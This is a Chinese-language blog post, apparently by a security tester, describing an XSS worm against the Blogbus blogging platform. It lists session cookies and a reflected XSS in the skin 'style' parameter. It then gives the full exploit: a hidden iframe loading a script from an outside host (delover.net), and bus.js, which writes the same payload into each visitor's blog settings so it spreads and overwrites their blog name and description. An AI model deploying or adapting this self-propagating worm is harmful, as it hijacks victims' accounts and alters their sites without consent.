本来以为很简单的。测试碰到了不少问题。
后台管理为:http://www.blogbus.com/user/
前台XSS为:http://xxx.blogbus.com
需要跨域。直接试用COOKIE提交缺少session_id.
博客主页cookie:
—————————
Windows Internet Explorer
—————————
__utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F
—————————
确定
—————————
后台cookie:
—————————
Windows Internet Explorer
—————————
blogbus_as_hash=4be67586fb028479bc7c8e8d105d37a6; __utma=269084194.42081505.1243533426.1243533426.1243538283.2; __utmz=269084194.1243533426.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); valid=blogbus.com; bus_xuid=4856367; __utmb=269084194; __utmc=269084194; bus_uid=4856367; cmt_homepage=http%3A%2F%2F; bus_sessid=bf414d9e43c1a75274de5ab2c09567db
—————————
确定
—————————
偷懒找到一个非持久的XSS,刚好cookie里包含了session_id
http://www.blogbus.com/skin/?style=< … script>
后面就简单了:
http://www.blogbus.com/user/?mm=Setting
页面允许写入任意JS。前台执行。我们一个隐藏框架将非持久传唤为持久。
最后贴上exp,很多bug,写的匆忙,将所有的选项都直接修改了。
<iframe style="display:none" src="http://www.blogbus.com/skin/?style=<SCRIPT%20src=’http://www.delover.net/bus.js’></SCRIPT>"></iframe>
bus.js
function createAjax() {
var _xmlhttp;
try {
_xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {
try {
_xmlhttp=new XMLHttpRequest();
}
catch (e) {
_xmlhttp=false;
}
}
return _xmlhttp;
}
//javascript:alert(document.cookie)
function GetTag() {
var xmlhttp=createAjax();
if (xmlhttp) {
xmlhttp.open(‘get’,’/user/?blogid=4884256&mm=Setting&n=’+Math.random(),true);
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4 && xmlhttp.status==200) {
if (unescape(xmlhttp.responseText).indexOf("www.blogbus.com/skin")>=0 || unescape(xmlhttp.responseText).indexOf("img_regbtn.gif")>=0){
//传播过了
}else{
AddNew();
}
}
}
xmlhttp.send(null);
}
}
function AddNew() {
var xmlhttp=createAjax();
if (xmlhttp) {
var GuestInfo="BlogName=jackal&Description=jackal&AccessPwd=&Meta=%3Ciframe+style%3D%22display%3Anone%22+src%3D%22http%3A%2F%2Fwww.blogbus.com%2Fskin%2F%3Fstyle%3D%3CSCRIPT%2520src%3D%27http%3A%2F%2Fdelover.net%2Fbus.js%27%3E%3C%2FSCRIPT%3E%22%3E%3C%2Fiframe%3E&Submit=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE";
//debug
//alert(GuestInfo);
xmlhttp.open(‘post’,’/user/?mm=Setting&aa=Save&n=’+Math.random(),true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.onreadystatechange=function() {
if (xmlhttp.readyState==4 && xmlhttp.status==200) {
//alert(unescape(xmlhttp.responseText));
}
}
xmlhttp.send(GuestInfo);
}
}
GetTag();
测试地址:http://delover.blogbus.com/
0 条评论。